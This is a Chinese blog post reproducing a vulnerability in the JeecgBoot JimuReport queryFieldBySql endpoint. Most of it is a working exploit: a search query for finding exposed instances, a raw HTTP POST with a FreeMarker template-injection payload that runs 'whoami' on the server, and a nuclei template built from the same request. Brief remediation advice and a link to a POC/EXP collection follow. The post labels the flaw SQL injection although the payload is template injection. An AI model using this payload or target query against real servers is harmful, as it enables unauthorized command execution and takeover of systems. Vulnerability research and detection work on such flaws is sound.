【漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞

于 2024-10-01 15:06:32 发布
阅读量650 收藏 5
点赞数 10
分类专栏: 漏洞复现 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142671061
版权


》》》产品描述《《《

        积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!

》》》漏洞描述《《《

        JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

》》》搜索语句《《《

title="Jeecg-Boot 快速开发平台" || body="积木报表"

》》》漏洞复现《《《

POST /jmreport/queryFieldBySql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Length: 100
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}

yaml

id: JeecgBoot 积木报表 queryFieldBySql

info:
  name: JeecgBoot 积木报表 queryFieldBySql
  author: Kelicehn
  severity: high

http:
  - raw:
      - |
        POST /jmreport/queryFieldBySql HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
        Content-Length: 100
        Content-Type: application/json; charset=utf-8
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

        {"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "freemarker.template.utility.Execute"
          - "$(whoami)"

》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略,设置白名单访问。
3、升级产品到最新版本

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

A 八方
关注
专栏目录
漏洞复现JeecgBoot 积木报表 testConnection JDBC 远程代码执行
凝聚力安全团队
07-08 1159
JeecgBoot 积木报表 testConnection 接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 2496
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
JeecgBoot积木报表AviatorScript表达式注入漏洞复现
柠檬i的博客
09-02 646
积木报表(JimuReport),是一款免费的数据可视化报表,类似于excel操作风格,通过拖拽完成报表设计,含报表设计和大屏设计。在积木报表1.7.8版本存在漏洞,可以通过表达式注入进行命令执行,进一步可获得系统权限。
jeect-boot积木报表 queryFieldBySql接口RCE漏洞(CVE-2023-4450)
qq_23003811的博客
07-23 763
jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。1、RCE任意命令执行。
[漏洞复现]JeecgBoot AviatorScript表达式注入漏洞复现
LiangYueSec的博客
08-08 1295
[漏洞复现]JeecgBoot AviatorScript表达式注入漏洞复现
漏洞复现-​jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)​
玄道的网安博客
08-12 647
的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包。漏洞产生点在积木报表插件内,查看更新的3.5.1的版本更新。建议更新当前系统或软件至最新版,完成漏洞的修复。这个修复是针对于后端的SQL注入,更改了72处的文件,其中需要注意。目前积木官方的jar包已升级。中增加了对sql语句的正则。关注积木5月份的升级日志。中重写了数据插入的方法。
漏洞通知】JeecgBoot 修复 Freemarker 模板注入漏洞漏洞危害等级:高危
JEECG官方博客
08-15 6330
漏洞通知】JeecgBoot 修复Freemarker模板注入漏洞漏洞危害等级:高危
Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现
weixin_45908624的博客
09-11 3171
JeecgBoot 前台接口SQL注入漏洞
JeecgBoot(vue2)如何创建积木报表并配置菜单
weixin_42654944的博客
06-13 350
https://blog.csdn.net/jiao_zg/article/details/132418506http://report.jeecg.com/2224660https://static.kancloud.cn/zhangdaiscott/vue3/3090734
jeecg-boot queryFieldBySql接口基于SSTI的任意代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-10 519
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
CVE-2023-1454:Jeecg-Boot SQL注入漏洞复现
薛定谔嘚喵博客
09-15 1470
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api 接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 2010
JeecgBootjeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
sql server每天定时执行sql语句
doubleintfloat的博客
09-27 391
2、鼠标右击【SQL Server 代理】,选择【启动(S)】,如已启动,可以省略此步骤;3、右键,新建-》作业,在作业上-》新建作业,然后在作业上右键-》属性。1、打开SQL Server Management Studio。结果如下 , 定时每个10秒向数据库里插入一条数据。作业名称,数据库语句。
Postgresql特殊关键字
czjnoe的博客
09-25 327
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
SQL 查询优化与实战
qq_63170044的博客
09-26 934
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 753
一旦发现漏洞sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
PostgreSQL 17新特性merge语法增强
最新发布
zxrhhm的博客
09-27 518
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 891
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值